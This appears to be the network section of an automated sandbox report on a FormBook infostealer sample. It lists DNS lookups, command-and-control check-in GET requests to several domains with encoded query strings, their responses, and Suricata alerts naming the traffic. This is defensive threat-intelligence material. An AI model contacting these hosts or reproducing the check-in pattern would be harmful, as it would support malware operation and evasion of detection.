Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.gdtanhua.icu | CNAME 256.93cu.com; 154.12.93.8 | |
www.starsyx.com | | |
www.bradleymartinfitness.com | | |
www.districonsumohome.com | 172.67.170.89 | |
www.ecuajet.net | 23.231.50.47 | |
UDP Requests
- 192.168.56.103:50800 -> 164.124.101.2:53
- 192.168.56.103:52760 -> 164.124.101.2:53
- 192.168.56.103:53673 -> 164.124.101.2:53
- 192.168.56.103:62576 -> 164.124.101.2:53
- 192.168.56.103:64894 -> 164.124.101.2:53
- 192.168.56.103:137 -> 192.168.56.255:137
- 192.168.56.103:138 -> 192.168.56.255:138
- 192.168.56.103:49154 -> 239.255.255.250:1900
HTTP Requests

GET http://www.districonsumohome.com/tb8i/?hBZLW8l=uPlnLoSq3YhnKr6XkI/ibKBZR5UbIYDon83yscU5401mNJ1eOsSEnnQZdNPUCUqLRQJWzWjQ&jL3Tir=_PG0kH6pr8nlATBp (status 301)

Request:
```http
GET /tb8i/?hBZLW8l=uPlnLoSq3YhnKr6XkI/ibKBZR5UbIYDon83yscU5401mNJ1eOsSEnnQZdNPUCUqLRQJWzWjQ&jL3Tir=_PG0kH6pr8nlATBp HTTP/1.1
Host: www.districonsumohome.com
Connection: close
```

Response:
```http
HTTP/1.1 301 Moved Permanently
Date: Wed, 08 Nov 2023 08:32:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=cfsc0lbja5qcp9i9udb0gvek1a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://www.districonsumohome.com/tb8i/?hBZLW8l=uPlnLoSq3YhnKr6XkI/ibKBZR5UbIYDon83yscU5401mNJ1eOsSEnnQZdNPUCUqLRQJWzWjQ&jL3Tir=_PG0kH6pr8nlATBp/
X-Site-Id: b06a19763874333f5edff4b04bf679c214e98c722884801262aad1993356293a7f5e1153
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XoaKNWuwbnB2AuCoTMJI4M1pjFZZfpCTk3FfzsIjOKIqQvzOLxvyAOvRoziUAST%2BPEHuhJoVbQPQaNXmLjS8f939L6NraTANxm%2FAUuiSnQFc3weOuRaqJvLJtOp%2FxhZuJLX%2BMbG%2Fd4rw%2Ftct"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 822c77f18d942f51-LAX
alt-svc: h3=":443"; ma=86400
```

GET http://www.gdtanhua.icu/tb8i/?hBZLW8l=5AAXAdZlmcRrCDR+Yfx/EblZaZMinPv2SiPC8X54i0y8Yz2HVSjKC3lJUrpNHrztM6AvkM+R&jL3Tir=_PG0kH6pr8nlATBp (status 200)

Request:
```http
GET /tb8i/?hBZLW8l=5AAXAdZlmcRrCDR+Yfx/EblZaZMinPv2SiPC8X54i0y8Yz2HVSjKC3lJUrpNHrztM6AvkM+R&jL3Tir=_PG0kH6pr8nlATBp HTTP/1.1
Host: www.gdtanhua.icu
Connection: close
```

Response:
```http
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Nov 2023 08:33:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
```

GET http://www.ecuajet.net/tb8i/?hBZLW8l=K0i+LInbjQMeF01bJpA1pnYCvby0p5ea/1o04Epx1gQSdVWES3s1884re8hJdKUMMJ2T7E8o&jL3Tir=_PG0kH6pr8nlATBp (status 0; no response captured)

Request:
```http
GET /tb8i/?hBZLW8l=K0i+LInbjQMeF01bJpA1pnYCvby0p5ea/1o04Epx1gQSdVWES3s1884re8hJdKUMMJ2T7E8o&jL3Tir=_PG0kH6pr8nlATBp HTTP/1.1
Host: www.ecuajet.net
Connection: close
```
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.103:64894 -> 164.124.101.2:53 | 2026888 | ET INFO DNS Query for Suspicious .icu Domain | Potentially Bad Traffic |
TCP 192.168.56.103:49166 -> 104.21.47.35:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49167 -> 154.12.93.8:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49168 -> 23.231.50.47:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts